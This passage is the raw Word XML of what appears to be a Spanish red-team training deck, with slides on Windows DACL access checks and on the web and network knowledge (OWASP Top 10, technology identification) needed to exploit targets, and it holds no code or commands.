        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="379C565E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03AA1437" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2ED64112" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C8B2721" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="316903CB" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="24C33E51" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="52"/>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50304" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0D35663F" wp14:editId="54A04192">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>6458711</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>210228</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3543300" cy="429895"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>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29895"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="05972866" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="63" w:line="235" w:lineRule="auto"/>
                              <w:ind w:left="948" w:right="232" w:hanging="713"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                              </w:rPr>
                              <w:t>2. Estos pasos se repiten hasta que se recopila suficiente información para conceder acceso al recurso.</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="0D35663F" id="Textbox 300" o:spid="_x0000_s1157" type="#_x0000_t202" style="position:absolute;margin-left:508.55pt;margin-top:16.55pt;width:279pt;height:33.85pt;z-index:-15666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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="05972866" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="63" w:line="235" w:lineRule="auto"/>
                        <w:ind w:left="948" w:right="232" w:hanging="713"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                        </w:rPr>
                        <w:t>2. Estos pasos se repiten hasta que se recopila suficiente información para conceder acceso al recurso.</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="topAndBottom" anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="713A6C69" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="695DE0D1" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5186A8B0" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36023DF5" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F0FA790" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="59"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="669C04B2" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:spacing w:line="133" w:lineRule="exact"/>
        <w:ind w:right="1463"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="15792128" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="23007135" wp14:editId="6303B8B2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>5210555</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-627788</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3168650" cy="64643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0" cy="646430"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:srgbClr val="E7E6E6"/>
                        </a:solidFill>
                        <a:ln w="12700">
                          <a:solidFill>
                            <a:srgbClr val="4471C4"/>
                          </a:solidFill>
                          <a:prstDash val="solid"/>
                        </a:ln>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="6F8F9B26" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:before="65" w:line="235" w:lineRule="auto"/>
                              <w:ind w:left="460" w:right="165" w:hanging="298"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>1. El SID grupal e individual coincide con las entradas DACL para ver si el usuario está explícitamente</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="733FFC19" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                            <w:pPr>
                              <w:spacing w:line="290" w:lineRule="exact"/>
                              <w:ind w:left="285"/>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:color w:val="000000"/>
                                <w:sz w:val="24"/>
                              </w:rPr>
                              <w:t>Acceso denegado y luego verifica si está permitido</w:t>
                            </w:r>
                          </w:p>
                        </w:txbxContent>
                      </wps:txbx>
                      <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                        <a:noAutofit/>
                      </wps:bodyPr>
                    </wps:wsp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:shape w14:anchorId="23007135" id="Textbox 301" o:spid="_x0000_s1158" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:410.3pt;margin-top:-49.45pt;width:249.5pt;height:50.9pt;z-index:1579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" fillcolor="#e7e6e6" strokecolor="#4471c4" strokeweight="1pt">
                <v:path arrowok="t"/>
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="6F8F9B26" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:before="65" w:line="235" w:lineRule="auto"/>
                        <w:ind w:left="460" w:right="165" w:hanging="298"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>1. El SID grupal e individual coincide con las entradas DACL para ver si el usuario está explícitamente</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="733FFC19" w14:textId="77777777" w:rsidR="001B199E" w:rsidRDefault="007F001E">
                      <w:pPr>
                        <w:spacing w:line="290" w:lineRule="exact"/>
                        <w:ind w:left="285"/>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:color w:val="000000"/>
                          <w:sz w:val="24"/>
                        </w:rPr>
                        <w:t>Acceso denegado y luego verifica si está permitido</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap anchorx="page"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="888888"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>71</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6D0226" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:spacing w:line="133" w:lineRule="exact"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId130"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="240" w:right="0" w:bottom="500" w:left="0" w:header="0" w:footer="314" w:gutter="0"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12F82B59" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2840"/>
        </w:tabs>
        <w:spacing w:before="391"/>
        <w:ind w:left="2840" w:hanging="1525"/>
        <w:jc w:val="left"/>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78560" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="20D17895" wp14:editId="1F0B9F88">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="page">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="12192000" cy="5021580"/>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5021580"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="12192000" cy="5021580"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="305" name="Graphic 305"/>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pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="306" name="Image 306"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId131" cstate="print"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="8394192" y="1223772"/>
                            <a:ext cx="3797807" cy="3797807"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="37D97326" id="Group 304" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:0;width:960pt;height:395.4pt;z-index:-17937920;mso-wrap-distance-left:0;mso-wrap-distance-right:0;mso-position-horizontal-relative:page;mso-position-vertical-relative:page" coordsize="121920,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">
                <v:shape id="Graphic 305" o:spid="_x0000_s1027"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" path="m12192000,l,,,1193291r12192000,l12192000,xe" fillcolor="#b34512" stroked="f">
                  <v:path arrowok="t"/>
                </v:shape>
                <v:shape id="Image 306" o:spid="_x0000_s1028" type="#_x0000_t75" style="position:absolute;left:83941;top:12237;width:37978;height:3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">
                  <v:imagedata r:id="rId132" o:title=""/>
                </v:shape>
                <w10:wrap anchorx="page" anchory="page"/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Explotación de Tecnologías en Red Teaming</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A3AA01" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo7"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1706"/>
        </w:tabs>
        <w:spacing w:before="742"/>
        <w:ind w:left="1706" w:hanging="1195"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Tecnología Web </w:t>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b w:val="0"/>
          <w:spacing w:val="-10"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BDDCCE" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48CC88A7" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="97"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69A342E3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1553"/>
          <w:tab w:val="left" w:pos="1590"/>
        </w:tabs>
        <w:spacing w:line="254" w:lineRule="auto"/>
        <w:ind w:left="1553" w:right="8077" w:hanging="322"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Se debe conocer el conocimiento de las 10 principales vulnerabilidades web de OWASP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3749F59A" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B5FE771" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="61"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="193EB35E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1590"/>
          <w:tab w:val="left" w:pos="1661"/>
        </w:tabs>
        <w:spacing w:line="254" w:lineRule="auto"/>
        <w:ind w:left="1661" w:right="5745" w:hanging="430"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>También podemos encontrarnos con escenarios en los que necesitemos realizar una Explotación Web personalizada (Encadenamiento de Vulnerabilidades)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1573E468" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A0E39A8" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="61"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2EC6ADA3" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1590"/>
        </w:tabs>
        <w:spacing w:line="552" w:lineRule="exact"/>
        <w:ind w:left="1590" w:hanging="359"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Identificación del entorno de Target específicamente para la identificación de Tecnologías Web</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17000442" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:line="552" w:lineRule="exact"/>
        <w:ind w:left="1591"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>son necesarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B01ABC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:line="552" w:lineRule="exact"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:sectPr w:rsidR="001B199E" w:rsidRPr="007A7B84">
          <w:footerReference w:type="default" r:id="rId133"/>
          <w:pgSz w:w="19200" w:h="10800" w:orient="landscape"/>
          <w:pgMar w:top="0" w:right="0" w:bottom="500" w:left="0" w:header="0" w:footer="314" w:gutter="0"/>
          <w:pgNumType w:start="72"/>
          <w:cols w:space="720"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5CFE986E" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Ttulo7"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1533"/>
        </w:tabs>
        <w:spacing w:before="424"/>
        <w:ind w:left="1533" w:hanging="1195"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:noProof/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="485379072" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1BF3EF1D" wp14:editId="7828E2AE">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>7382256</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>3556</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4152900" cy="3066288"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapNone/>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34" cstate="print"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4152900" cy="3066288"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Tecnología de red:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2A90CC" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="001B199E">
      <w:pPr>
        <w:pStyle w:val="Textoindependiente"/>
        <w:spacing w:before="165"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3201BDF9" w14:textId="77777777" w:rsidR="001B199E" w:rsidRPr="007A7B84" w:rsidRDefault="007F001E">
      <w:pPr>
        <w:pStyle w:val="Prrafodelista"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1417"/>
          <w:tab w:val="left" w:pos="1488"/>
        </w:tabs>
        <w:spacing w:line="254" w:lineRule="auto"/>
        <w:ind w:left="1488" w:right="8646" w:hanging="430"/>
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">Comprensión de dispositivos de red como enrutadores, conmutadores, servidores, computadoras, etc. y protocolos de red en uso </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>en</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A7B84">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:hAnsi="Aptos"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
